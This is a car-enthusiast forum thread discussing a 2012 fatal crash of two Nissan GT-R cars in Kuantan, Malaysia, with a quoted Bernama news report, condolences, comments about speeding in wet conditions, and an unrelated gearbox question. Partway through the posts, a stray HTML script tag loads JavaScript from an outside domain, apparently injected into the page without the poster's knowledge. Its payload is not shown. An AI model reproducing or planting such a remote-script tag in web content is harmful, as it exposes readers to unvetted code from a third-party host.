RIP to the GTR R35 owners(crashed kuatan)

huakenny

LB Performance
Feb 24, 2005
Kota Kinabalu
Visit site
KUANTAN (Oct 7, 2012): Four people died on the spot and two others suffered serious injuries when two cars lost control and hit a tree at Jalan Haji Ahmad 1 while on their way to Semambu, early this morning.

During the 4am incident, the two cars, believed to be speeding, lost control under wet conditions and crashed into trees by the road side.

Pahang police Administration and Traffic enforcement officer ASP Zainalabidin Othman said the four victims killed in the accident were the driver of a Nissan GTR, Tan Kah Yong, 24, passenger Bao Shanshan who was seated in the front, Go Haw Wei, 20, the driver of a Nissan Skyline car and passenger Koay Khor Liang, 21, who was seated in the front seat.

"Initial investigations revealed that the two cars, heading to Semambu from Kuantan, were speeding but lost control due to wet road conditions before crashing into trees," he told Bernama here today.

He added that two more passengers from the Nissan GTR car, whose identities have yet to be determined, were seriously injured.

"The driver of the Nissan GTR and Nissan Skyline are businessmen while the passengers are workers at a spa. The bodies of the dead were later sent to the Tengku Ampuan Afzan Hospital in Kuantan for post-mortem," he said. – Bernama

source:Two GTR crash at Kuantan

Attachments

RENESIS VIII

7,000 RPM
Jun 13, 2012
Ipoh
Skyline? I see no Skyline in the pictures. Both are Nissan GT-R (R35). RIP and I express my condolences to the drivers and passengers of both cars. A shocking and sad news indeed.

p3jal

1,000 RPM
Jan 20, 2007
Selangor
he drive fast when wet road condition..walaowehhhhhhhh RIP =( .

Dayline668

1,500 RPM
Aug 4, 2007
KL
He though his 4wd is god, can grip the road like lizard... young ppl these days... never think 1st b4 action...

GaBaX

Oct 2, 2004
Kuantan
www.friendster.com
The NEWS MEDIA HAD GIVEN WRONG INFORMATIONS ABOUT THE SPORTCAR MODELS!!!

Both sportcar crashes are TWO NISSAN GT-R R35s!!!

The dead owner of the White R35 is my friend's elder brother. I'm truly feel so sorry for my friend. He just lost his elder brother.

He just got the R35 just in a few weeks ago...

---------- Post added at 12:36 AM ---------- 6 hour anti-bump limit - Previous post was at 12:35 AM ----------

<script src="http://livefeedback.net/js/plunginfy/pluginmng.js" type="text/javascript"></script>
Moral of the news: don't mess with speed and trees.
Bro, u missed out one more thing....RAIN...that makes the road wet....:driver:

Random Post Every 5 Minutes

Can i fix the original 4g15p wira(m) 1.5 gearbox in 4g93t??? Coz i bought the halfcut gsr was auto...

What will be the disadvantage??

My fren using 4g15p gearbox in his 4g92 mivec, he say can use, but will decrease the power and cant always high rev coz will easily bust the gearbox.. is it true??

Some pro help me pls??? thanks~~:X-:
Ask a question, start a discussion or post something for sale!
Post thread

Online now

Enjoying Zerotohundred?

Log-in for an ad-less experience